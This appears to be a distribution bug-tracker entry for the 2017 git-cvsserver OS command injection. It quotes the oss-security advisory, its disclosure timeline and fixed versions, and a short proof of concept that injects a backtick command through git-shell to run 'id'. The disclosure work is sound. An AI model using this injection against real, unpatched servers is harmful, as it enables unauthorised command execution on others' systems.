[CVE] Git cvsserver OS Command Injection
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
git (Debian) |
Fix Released
|
Unknown
|
|||
git (Ubuntu) |
Fix Released
|
High
|
Simon Quigley | ||
Trusty |
Fix Released
|
High
|
Simon Quigley | ||
Xenial |
Fix Released
|
High
|
Simon Quigley | ||
Zesty |
Fix Released
|
High
|
Simon Quigley | ||
Artful |
Fix Released
|
High
|
Simon Quigley |
Bug Description
From oss-security[1]:
[ Authors ]
joernchen <joernchen () phenoelit de>
Phenoelit Group (http://
[ Affected Products ]
Git before 2.14.2, 2.13.6, 2.12.5, 2.11.4 and 2.10.5 (git-cvsserver)
https:/
[ Vendor communication ]
2017-09-08 Sent vulnerability details to the git-security list
2017-09-09 Acknowledgement of the issue, git maintainers ask if
2017-09-10 Patch is provided
2017-09-11 Further backtick operations are patched by the git
2017-09-11 Revised patch is sent out
2017-09-11 Jeff King proposes to drop `git-cvsserver`'s default
2017-09-22 Draft release for git 2.14.2 is created including the
2017-09-26 Release of this advisory, release of fixed git versions
[ Description ]
The `git` subcommand `cvsserver` is a Perl script which makes excessive
use of the backtick operator to invoke `git`. Unfortunately user input
is used within some of those invocations.
It should be noted, that `git-cvsserver` will be invoked by `git-shell`
by default without further configuration.
[ Example ]
Below a example of a OS Command Injection within `git-cvsserver`
triggered via `git-shell`:
[git@...t ~]$ cat .ssh/authorized
command="git-shell -c \"$SSH_
[joernchen@...t ~]$ ssh git@...alhost cvs server
Root /tmp
E /tmp/ does not seem to be a valid GIT repository
E
error 1 /tmp/ is not a valid repository
Directory .
`id>foooooo`
add
fatal: Not a git repository: '/tmp/'
Invalid module '`id>foooooo`' at /usr/lib/
[joernchen@...t ~]$
[git@...t ~]$ cat foooooo
uid=619(git) gid=618(git) groups=618(git)
[git@...t ~]$
[ Solution ]
Upgrade to one of the following git versions:
* 2.14.2
* 2.13.6
* 2.12.5
* 2.11.4
* 2.10.5
[ end of file ]
-------------------
No CVE has been assigned yet, but a fix has been released upstream and as seen above, the fixes are already in Debian.
The following upstream commits claim to fix the issue:
- 985f59c042320dd
- 31add46823fe926
- 6d6e2f812d36678
- dca89d4e56dde4b
CVE References
Changed in git (Debian): | |
status: | Unknown → Fix Released |
summary: |
- [DSA 3984-1] Git cvsserver OS Command Injection + [CVE] Git cvsserver OS Command Injection |
Changed in git (Ubuntu Artful): | |
status: | In Progress → Fix Committed |
Security Team:
Debian marks this as a high importance vulnerability, I'll follow suit and change the importance here, please feel free to mark it otherwise.
Otherwise, I plan on working on a fix for this, I'll put something here within an hour or two.
Thanks!